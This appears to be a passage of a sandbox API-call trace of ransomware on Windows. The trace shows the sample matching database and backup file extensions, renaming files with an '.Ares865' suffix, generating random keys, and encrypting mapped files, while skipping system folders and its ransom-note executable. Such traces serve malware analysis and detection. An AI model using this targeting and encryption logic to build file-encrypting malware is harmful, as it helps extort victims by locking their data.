[0077.295] lstrlenW (lpString="dacpac") returned 6 [0077.295] lstrcmpiW (lpString1="b1.cab", lpString2="dacpac") returned -1 [0077.295] lstrlenW (lpString="dad") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="dad") returned -1 [0077.295] lstrlenW (lpString="dadiagrams") returned 10 [0077.295] lstrlenW (lpString="daschema") returned 8 [0077.295] lstrlenW (lpString="db-journal") returned 10 [0077.295] lstrlenW (lpString="db-shm") returned 6 [0077.295] lstrcmpiW (lpString1="b1.cab", lpString2="db-shm") returned -1 [0077.295] lstrlenW (lpString="db-wal") returned 6 [0077.295] lstrcmpiW (lpString1="b1.cab", lpString2="db-wal") returned -1 [0077.295] lstrlenW (lpString="dbc") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="dbc") returned -1 [0077.295] lstrlenW (lpString="dbs") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="dbs") returned -1 [0077.295] lstrlenW (lpString="dbt") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="dbt") returned -1 [0077.295] lstrlenW (lpString="dbv") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="dbv") returned -1 [0077.295] lstrlenW (lpString="dbx") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="dbx") returned -1 [0077.295] lstrlenW (lpString="dcb") returned 3 [0077.295] lstrcmpiW (lpString1="cab", lpString2="dcb") returned -1 [0077.296] lstrlenW (lpString="dct") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="dct") returned -1 [0077.296] lstrlenW (lpString="dcx") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="dcx") returned -1 [0077.296] lstrlenW (lpString="ddl") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="ddl") returned -1 [0077.296] lstrlenW (lpString="dlis") returned 4 [0077.296] lstrcmpiW (lpString1=".cab", lpString2="dlis") returned -1 [0077.296] lstrlenW (lpString="dp1") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="dp1") returned -1 [0077.296] lstrlenW (lpString="dqy") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="dqy") returned -1 [0077.296] lstrlenW (lpString="dsk") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="dsk") returned -1 [0077.296] lstrlenW (lpString="dsn") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="dsn") returned -1 [0077.296] lstrlenW (lpString="dtsx") returned 4 [0077.296] lstrcmpiW (lpString1=".cab", lpString2="dtsx") returned -1 [0077.296] lstrlenW (lpString="dxl") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="dxl") returned -1 [0077.296] lstrlenW (lpString="eco") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="eco") returned -1 [0077.296] lstrlenW (lpString="ecx") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="ecx") returned -1 [0077.296] lstrlenW (lpString="edb") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="edb") returned -1 [0077.296] lstrlenW (lpString="epim") returned 4 [0077.296] lstrcmpiW (lpString1=".cab", lpString2="epim") returned -1 [0077.296] lstrlenW (lpString="fcd") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="fcd") returned -1 [0077.296] lstrlenW (lpString="fdb") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="fdb") returned -1 [0077.296] lstrlenW (lpString="fic") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="fic") returned -1 [0077.296] lstrlenW (lpString="flexolibrary") returned 12 [0077.296] lstrlenW (lpString="fm5") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="fm5") returned -1 [0077.296] lstrlenW (lpString="fmp") returned 3 [0077.296] lstrcmpiW (lpString1="cab", lpString2="fmp") returned -1 [0077.297] lstrlenW (lpString="fmp12") returned 5 [0077.297] lstrcmpiW (lpString1="1.cab", lpString2="fmp12") returned -1 [0077.297] lstrlenW (lpString="fmpsl") returned 5 [0077.297] lstrcmpiW (lpString1="1.cab", lpString2="fmpsl") returned -1 [0077.297] lstrlenW (lpString="fol") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="fol") returned -1 [0077.297] lstrlenW (lpString="fp3") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="fp3") returned -1 [0077.297] lstrlenW (lpString="fp4") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="fp4") returned -1 [0077.297] lstrlenW (lpString="fp5") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="fp5") returned -1 [0077.297] lstrlenW (lpString="fp7") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="fp7") returned -1 [0077.297] lstrlenW (lpString="fpt") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="fpt") returned -1 [0077.297] lstrlenW (lpString="frm") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="frm") returned -1 [0077.297] lstrlenW (lpString="gdb") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0077.297] lstrlenW (lpString="gdb") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0077.297] lstrlenW (lpString="grdb") returned 4 [0077.297] lstrcmpiW (lpString1=".cab", lpString2="grdb") returned -1 [0077.297] lstrlenW (lpString="gwi") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="gwi") returned -1 [0077.297] lstrlenW (lpString="hdb") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="hdb") returned -1 [0077.297] lstrlenW (lpString="his") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="his") returned -1 [0077.297] lstrlenW (lpString="ib") returned 2 [0077.297] lstrcmpiW (lpString1="ab", lpString2="ib") returned -1 [0077.297] lstrlenW (lpString="idb") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="idb") returned -1 [0077.297] lstrlenW (lpString="ihx") returned 3 [0077.297] lstrcmpiW (lpString1="cab", lpString2="ihx") returned -1 [0077.297] lstrlenW (lpString="itdb") returned 4 [0077.297] lstrcmpiW (lpString1=".cab", lpString2="itdb") returned -1 [0077.298] lstrlenW (lpString="itw") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="itw") returned -1 [0077.298] lstrlenW (lpString="jet") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="jet") returned -1 [0077.298] lstrlenW (lpString="jtx") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="jtx") returned -1 [0077.298] lstrlenW (lpString="kdb") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="kdb") returned -1 [0077.298] lstrlenW (lpString="kexi") returned 4 [0077.298] lstrcmpiW (lpString1=".cab", lpString2="kexi") returned -1 [0077.298] lstrlenW (lpString="kexic") returned 5 [0077.298] lstrcmpiW (lpString1="1.cab", lpString2="kexic") returned -1 [0077.298] lstrlenW (lpString="kexis") returned 5 [0077.298] lstrcmpiW (lpString1="1.cab", lpString2="kexis") returned -1 [0077.298] lstrlenW (lpString="lgc") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="lgc") returned -1 [0077.298] lstrlenW (lpString="lwx") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="lwx") returned -1 [0077.298] lstrlenW (lpString="maf") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="maf") returned -1 [0077.298] lstrlenW (lpString="maq") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="maq") returned -1 [0077.298] lstrlenW (lpString="mar") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="mar") returned -1 [0077.298] lstrlenW (lpString="marshal") returned 7 [0077.298] lstrcmpiW (lpString1="ab1.cab", lpString2="marshal") returned -1 [0077.298] lstrlenW (lpString="mas") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="mas") returned -1 [0077.298] lstrlenW (lpString="mav") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="mav") returned -1 [0077.298] lstrlenW (lpString="maw") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="maw") returned -1 [0077.298] lstrlenW (lpString="mdbhtml") returned 7 [0077.298] lstrcmpiW (lpString1="ab1.cab", lpString2="mdbhtml") returned -1 [0077.298] lstrlenW (lpString="mdn") returned 3 [0077.298] lstrcmpiW (lpString1="cab", lpString2="mdn") returned -1 [0077.298] lstrlenW (lpString="mdt") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="mdt") returned -1 [0077.299] lstrlenW (lpString="mfd") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="mfd") returned -1 [0077.299] lstrlenW (lpString="mpd") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="mpd") returned -1 [0077.299] lstrlenW (lpString="mrg") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="mrg") returned -1 [0077.299] lstrlenW (lpString="mud") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="mud") returned -1 [0077.299] lstrlenW (lpString="mwb") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="mwb") returned -1 [0077.299] lstrlenW (lpString="myd") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="myd") returned -1 [0077.299] lstrlenW (lpString="ndf") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="ndf") returned -1 [0077.299] lstrlenW (lpString="nnt") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="nnt") returned -1 [0077.299] lstrlenW (lpString="nrmlib") returned 6 [0077.299] lstrcmpiW (lpString1="b1.cab", lpString2="nrmlib") returned -1 [0077.299] lstrlenW (lpString="ns2") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="ns2") returned -1 [0077.299] lstrlenW (lpString="ns3") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="ns3") returned -1 [0077.299] lstrlenW (lpString="ns4") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="ns4") returned -1 [0077.299] lstrlenW (lpString="nsf") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="nsf") returned -1 [0077.299] lstrlenW (lpString="nv") returned 2 [0077.299] lstrcmpiW (lpString1="ab", lpString2="nv") returned -1 [0077.299] lstrlenW (lpString="nv2") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="nv2") returned -1 [0077.299] lstrlenW (lpString="nwdb") returned 4 [0077.299] lstrcmpiW (lpString1=".cab", lpString2="nwdb") returned -1 [0077.299] lstrlenW (lpString="nyf") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="nyf") returned -1 [0077.299] lstrlenW (lpString="odb") returned 3 [0077.299] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0077.299] lstrlenW (lpString="odb") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0077.300] lstrlenW (lpString="oqy") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="oqy") returned -1 [0077.300] lstrlenW (lpString="ora") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="ora") returned -1 [0077.300] lstrlenW (lpString="orx") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="orx") returned -1 [0077.300] lstrlenW (lpString="owc") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="owc") returned -1 [0077.300] lstrlenW (lpString="p96") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="p96") returned -1 [0077.300] lstrlenW (lpString="p97") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="p97") returned -1 [0077.300] lstrlenW (lpString="pan") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="pan") returned -1 [0077.300] lstrlenW (lpString="pdb") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="pdb") returned -1 [0077.300] lstrlenW (lpString="pdm") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="pdm") returned -1 [0077.300] lstrlenW (lpString="pnz") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="pnz") returned -1 [0077.300] lstrlenW (lpString="qry") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="qry") returned -1 [0077.300] lstrlenW (lpString="qvd") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="qvd") returned -1 [0077.300] lstrlenW (lpString="rbf") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="rbf") returned -1 [0077.300] lstrlenW (lpString="rctd") returned 4 [0077.300] lstrcmpiW (lpString1=".cab", lpString2="rctd") returned -1 [0077.300] lstrlenW (lpString="rod") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="rod") returned -1 [0077.300] lstrlenW (lpString="rodx") returned 4 [0077.300] lstrcmpiW (lpString1=".cab", lpString2="rodx") returned -1 [0077.300] lstrlenW (lpString="rpd") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="rpd") returned -1 [0077.300] lstrlenW (lpString="rsd") returned 3 [0077.300] lstrcmpiW (lpString1="cab", lpString2="rsd") returned -1 [0077.300] lstrlenW (lpString="sas7bdat") returned 8 [0077.300] lstrlenW (lpString="sbf") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="sbf") returned -1 [0077.301] lstrlenW (lpString="scx") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="scx") returned -1 [0077.301] lstrlenW (lpString="sdb") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="sdb") returned -1 [0077.301] lstrlenW (lpString="sdc") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="sdc") returned -1 [0077.301] lstrlenW (lpString="sdf") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="sdf") returned -1 [0077.301] lstrlenW (lpString="sis") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="sis") returned -1 [0077.301] lstrlenW (lpString="spq") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="spq") returned -1 [0077.301] lstrlenW (lpString="te") returned 2 [0077.301] lstrcmpiW (lpString1="ab", lpString2="te") returned -1 [0077.301] lstrlenW (lpString="teacher") returned 7 [0077.301] lstrcmpiW (lpString1="ab1.cab", lpString2="teacher") returned -1 [0077.301] lstrlenW (lpString="tmd") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="tmd") returned -1 [0077.301] lstrlenW (lpString="tps") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="tps") returned -1 [0077.301] lstrlenW (lpString="trc") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0077.301] lstrlenW (lpString="trc") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0077.301] lstrlenW (lpString="trm") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="trm") returned -1 [0077.301] lstrlenW (lpString="udb") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="udb") returned -1 [0077.301] lstrlenW (lpString="udl") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="udl") returned -1 [0077.301] lstrlenW (lpString="usr") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="usr") returned -1 [0077.301] lstrlenW (lpString="v12") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="v12") returned -1 [0077.301] lstrlenW (lpString="vis") returned 3 [0077.301] lstrcmpiW (lpString1="cab", lpString2="vis") returned -1 [0077.302] lstrlenW (lpString="vpd") returned 3 [0077.302] lstrcmpiW (lpString1="cab", lpString2="vpd") returned -1 [0077.302] lstrlenW (lpString="vvv") returned 3 [0077.302] lstrcmpiW (lpString1="cab", lpString2="vvv") returned -1 [0077.302] lstrlenW (lpString="wdb") returned 3 [0077.302] lstrcmpiW (lpString1="cab", lpString2="wdb") returned -1 [0077.302] lstrlenW (lpString="wmdb") returned 4 [0077.302] lstrcmpiW (lpString1=".cab", lpString2="wmdb") returned -1 [0077.302] lstrlenW (lpString="wrk") returned 3 [0077.302] lstrcmpiW (lpString1="cab", lpString2="wrk") returned -1 [0077.302] lstrlenW (lpString="xdb") returned 3 [0077.302] lstrcmpiW (lpString1="cab", lpString2="xdb") returned -1 [0077.302] lstrlenW (lpString="xld") returned 3 [0077.302] lstrcmpiW (lpString1="cab", lpString2="xld") returned -1 [0077.302] lstrlenW (lpString="xmlff") returned 5 [0077.302] lstrcmpiW (lpString1="1.cab", lpString2="xmlff") returned -1 [0077.302] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.Ares865") returned 132 [0077.302] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.ares865"), dwFlags=0x1) returned 1 [0077.303] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xa4 [0077.303] GetFileSizeEx (in: hFile=0xa4, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1462871) returned 1 [0077.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0077.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0077.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0077.304] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0077.304] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0077.304] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.305] CreateFileMappingW (hFile=0xa4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x165560, lpName=0x0) returned 0x154 [0077.306] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x165560) returned 0x3450000 [0077.383] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0077.383] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0077.383] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.383] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0077.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0077.383] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0077.383] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0077.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0077.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0077.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0077.384] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0077.384] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0077.384] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0077.384] UnmapViewOfFile (lpBaseAddress=0x3450000) returned 1 [0077.399] CloseHandle (hObject=0x154) returned 1 [0077.399] CloseHandle (hObject=0xa4) returned 1 [0077.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0077.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0077.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0077.406] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c1e5280, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0077.406] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0077.406] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7a0c00, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfd7a0c00, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfd7a0c00, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x24000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="aoldtz.exe") returned 1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".") returned 1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="..") returned 1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="windows") returned -1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="bootmgr") returned 1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="temp") returned 1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="pagefile.sys") returned 1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="boot") returned 1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="ids.txt") returned 1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="ntuser.dat") returned 1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="perflogs") returned 1 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="MSBuild") returned 1 [0077.406] lstrlenW (lpString="vc_runtimeMinimum_x64.msi") returned 25 [0077.406] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 124 [0077.406] lstrcpyW (in: lpString1=0x2cce4e8, lpString2="vc_runtimeMinimum_x64.msi" | out: lpString1="vc_runtimeMinimum_x64.msi") returned="vc_runtimeMinimum_x64.msi" [0077.406] lstrlenW (lpString="vc_runtimeMinimum_x64.msi") returned 25 [0077.406] lstrlenW (lpString="Ares865") returned 7 [0077.406] lstrcmpiW (lpString1="x64.msi", lpString2="Ares865") returned 1 [0077.406] lstrlenW (lpString=".dll") returned 4 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".dll") returned 1 [0077.406] lstrlenW (lpString=".lnk") returned 4 [0077.406] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".lnk") returned 1 [0077.406] lstrlenW (lpString=".ini") returned 4 [0077.407] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".ini") returned 1 [0077.407] lstrlenW (lpString=".sys") returned 4 [0077.407] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".sys") returned 1 [0077.407] lstrlenW (lpString="vc_runtimeMinimum_x64.msi") returned 25 [0077.407] lstrlenW (lpString="bak") returned 3 [0077.407] lstrcmpiW (lpString1="msi", lpString2="bak") returned 1 [0077.407] lstrlenW (lpString="ba_") returned 3 [0077.407] lstrcmpiW (lpString1="msi", lpString2="ba_") returned 1 [0077.407] lstrlenW (lpString="dbb") returned 3 [0077.407] lstrcmpiW (lpString1="msi", lpString2="dbb") returned 1 [0077.407] lstrlenW (lpString="vmdk") returned 4 [0077.407] lstrcmpiW (lpString1=".msi", lpString2="vmdk") returned -1 [0077.407] lstrlenW (lpString="rar") returned 3 [0077.407] lstrcmpiW (lpString1="msi", lpString2="rar") returned -1 [0077.407] lstrlenW (lpString="zip") returned 3 [0077.407] lstrcmpiW (lpString1="msi", lpString2="zip") returned -1 [0077.407] lstrlenW (lpString="tgz") returned 3 [0077.407] lstrcmpiW (lpString1="msi", lpString2="tgz") returned -1 [0077.407] lstrlenW (lpString="vbox") returned 4 [0077.407] lstrcmpiW (lpString1=".msi", lpString2="vbox") returned -1 [0077.407] lstrlenW (lpString="vdi") returned 3 [0077.407] lstrcmpiW (lpString1="msi", lpString2="vdi") returned -1 [0077.407] lstrlenW (lpString="vhd") returned 3 [0077.407] lstrcmpiW (lpString1="msi", lpString2="vhd") returned -1 [0077.407] lstrlenW (lpString="vhdx") returned 4 [0077.407] lstrcmpiW (lpString1=".msi", lpString2="vhdx") returned -1 [0077.407] lstrlenW (lpString="avhd") returned 4 [0077.407] lstrcmpiW (lpString1=".msi", lpString2="avhd") returned -1 [0077.407] lstrlenW (lpString="db") returned 2 [0077.407] lstrcmpiW (lpString1="si", lpString2="db") returned 1 [0077.407] lstrlenW (lpString="db2") returned 3 [0077.407] lstrcmpiW (lpString1="msi", lpString2="db2") returned 1 [0077.407] lstrlenW (lpString="db3") returned 3 [0077.407] lstrcmpiW (lpString1="msi", lpString2="db3") returned 1 [0077.407] lstrlenW (lpString="dbf") returned 3 [0077.407] lstrcmpiW (lpString1="msi", lpString2="dbf") returned 1 [0077.407] lstrlenW (lpString="mdf") returned 3 [0077.407] lstrcmpiW (lpString1="msi", lpString2="mdf") returned 1 [0077.407] lstrlenW (lpString="mdb") returned 3 [0077.408] lstrcmpiW (lpString1="msi", lpString2="mdb") returned 1 [0077.408] lstrlenW (lpString="sql") returned 3 [0077.408] lstrcmpiW (lpString1="msi", lpString2="sql") returned -1 [0077.408] lstrlenW (lpString="sqlite") returned 6 [0077.408] lstrcmpiW (lpString1="64.msi", lpString2="sqlite") returned -1 [0077.408] lstrlenW (lpString="sqlite3") returned 7 [0077.408] lstrcmpiW (lpString1="x64.msi", lpString2="sqlite3") returned 1 [0077.408] lstrlenW (lpString="sqlitedb") returned 8 [0077.408] lstrcmpiW (lpString1="_x64.msi", lpString2="sqlitedb") returned -1 [0077.408] lstrlenW (lpString="xml") returned 3 [0077.408] lstrcmpiW (lpString1="msi", lpString2="xml") returned -1 [0077.408] lstrlenW (lpString="$er") returned 3 [0077.408] lstrcmpiW (lpString1="msi", lpString2="$er") returned 1 [0077.408] lstrlenW (lpString="4dd") returned 3 [0077.408] lstrcmpiW (lpString1="msi", lpString2="4dd") returned 1 [0077.408] lstrlenW (lpString="4dl") returned 3 [0077.408] lstrcmpiW (lpString1="msi", lpString2="4dl") returned 1 [0077.408] lstrlenW (lpString="^^^") returned 3 [0077.408] lstrcmpiW (lpString1="msi", lpString2="^^^") returned 1 [0077.408] lstrlenW (lpString="abs") returned 3 [0077.408] lstrcmpiW (lpString1="msi", lpString2="abs") returned 1 [0077.408] lstrlenW (lpString="abx") returned 3 [0077.408] lstrcmpiW 